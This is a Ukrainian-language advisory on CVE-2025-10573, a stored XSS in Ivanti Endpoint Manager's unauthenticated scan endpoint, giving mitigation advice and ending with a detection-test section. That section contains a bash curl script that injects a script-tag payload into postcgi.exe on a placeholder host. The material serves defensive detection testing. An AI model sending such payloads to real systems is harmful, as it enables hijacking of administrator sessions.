CVE-2025-10573: Уразливість Ivanti EPM з незахищеним збереженим XSS (виправлено)

Резюме

Ivanti Endpoint Manager (EPM) містить вразливість збереженого міжсайтового скриптингу, яка дозволяє неавтентифікованому зловмиснику впровадити шкідливий JavaScript у дані сканування пристроїв. Коли цей навантаження відображається на інформаційній панелі управління, це може бути використано для захоплення сесії адміністратора. Проблема зареєстрована під номером CVE-2025-10573 і має оцінку CVSS 9.6.

Розслідування

Rapid7 проаналізувала впровадження Ivanti EPM 11.0.6 Core на Windows Server 2022 та виявила, що сформований POST-запит до /incomingdata/postcgi.exe з шкідливими ключ=значення полями спричиняє збереження JavaScript, який згодом виконується в адміністративному інтерфейсі. Незахищена поведінка CGI-бінарного файлу postcgi.exe, який пише файли сканування поза веб-коренем, дозволяє цей шлях ін’єкції.

Пом’якшення

Ivanti випустила патч 2025-12-09, і оновлення до версії Ivanti EPM 2024 SU4 SR1 усуває вразливість. Rapid7 надасть автентифіковану перевірку вразливостей для клієнтів Exposure Command, InsightVM та Nexpose, щоб допомогти визначити уражені інсталяції.

Реакція

Організації повинні негайно впровадити оновлення 2024 SU4 SR1, обмежити неавтентифікований доступ до API /incomingdata та моніторити журнали веб-сервера на предмет POST-запитів, націлених на postcgi.exe. Вони також повинні переглядати сесії адміністратора на ознаки захоплення та змінювати будь-які облікові дані, які могли бути скомпрометовані.

Виконання симуляції

Передумова: Телеметрія та базова перевірка повинні успішно завершитися.

Обґрунтування: У цьому розділі детально описано точне виконання техніки супротивника (TTP), що призначена для запуску правила виявлення. Команди та описи МАЮТЬ безпосередньо відображати встановлені TTP та спрямовані на генерування саме тої телеметрії, якої очікує логіка виявлення.

• Опис атаки та команди:
  Зловмисник, виявивши, що кінцева точка сканування Ivanti EPM є неавтентифікованою, формує шкідливе сканування, вбудовуючи <script> тег, що відображає сповіщення (представляє захоплення сесії). Зловмисник використовує curl для відправки цього навантаження, імітуючи легітимне надсилання сканування пристроїв. Оскільки навантаження відповідає точній строкі, на яку реагує правило, SIEM має згенерувати сповіщення.

• Скрипт регресійного тестування:

  #!/bin/bash
  # -------------------------------------------------
  # Імітація збереженого XSS проти Ivanti EPM Scan API
  # -------------------------------------------------
  
  # Цільовий URL (за необхідності налаштувати хост)
  TARGET="https://ivanti.example.com/incomingdata/postcgi.exe?prefix=ldscan&suffix=.scn&name=scan"
  
  # Шкідливе навантаження – точно така строка, якої очікує правило
  PAYLOAD="<script>alert('Обліковий запис адміністратора було захоплено')</script>"
  
  # Повний XML-текст, якого очікує Ivanti EPM (спрощений)
  XML_BODY="<scan><device><id>99999</id><notes>${PAYLOAD}</notes></device></scan>"
  
  # Відправити запит
  curl -k -X POST "$TARGET" 
    -H "Content-Type: application/xml" 
    -d "$XML_BODY"
  
  echo "Шкідливе сканування відправлено."

• Команди для очищення:
  Дані сканування зберігаються в базі даних Ivanti EPM; видалення зазвичай вимагає автентифікованого адміністратора. Для цілей тестування етап очищення обмежується видаленням тестового файлу з будь-якого локального журналу.

  #!/bin/bash
  # Просте очищення: видалення тимчасових журналів curl (якщо є)
  rm -f /tmp/curl_log_*
  echo "Локальні тестові артефакти видалено."